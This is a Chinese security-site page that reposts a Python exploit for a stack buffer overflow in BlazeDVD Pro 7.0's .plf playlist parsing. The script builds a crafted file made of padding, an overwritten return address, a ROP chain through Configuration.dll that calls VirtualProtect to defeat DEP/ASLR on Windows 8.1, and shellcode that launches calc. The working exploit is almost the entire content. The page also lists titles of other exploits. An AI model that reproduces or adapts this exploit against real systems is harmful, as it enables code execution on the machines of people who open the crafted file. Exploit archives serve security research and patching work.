首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)
来源:vfocus.net 作者:Giovanni 发布时间:2014-08-14  
# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials
  
#!/usr/bin/python
   
import sys, struct
   
file = "calc.plf"
  
junk1   = "\x41"*260
neweip  = "\x5b\x51\x32\x60"
junk2   = "\x41"*24
  
rop =  "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Value to be subtracted, will become 0x000000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Value to be subtracted, will become 0x000000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]
  
shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
             "\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
             "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
             "\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
             "\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
             "\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
             "\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
             "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")
  
exploit = junk1 + neweip + junk2 + rop + shellcode
   
writeFile = open(file, "w")
writeFile.write(exploit)
writeFile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VirtualBox Guest Additions VBo
·VMTurbo Operations Manager 4.6
·CS-Cart 4.2.0 Session Hijackin
·VirtualBox 3D Acceleration Vir
·Wordpress XMLRPC DoS Exploit
·Firefox toString console.time
·Yokogawa BKBCopyD.exe Client E
·Gitlab-shell Code Execution
·linux/x86 chmod(777 /etc/passw
·Senkas Kolibri WebServer 2.0 B
·linux/x86 Run /usr/bin/python
·BulletProof FTP Client 2010 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved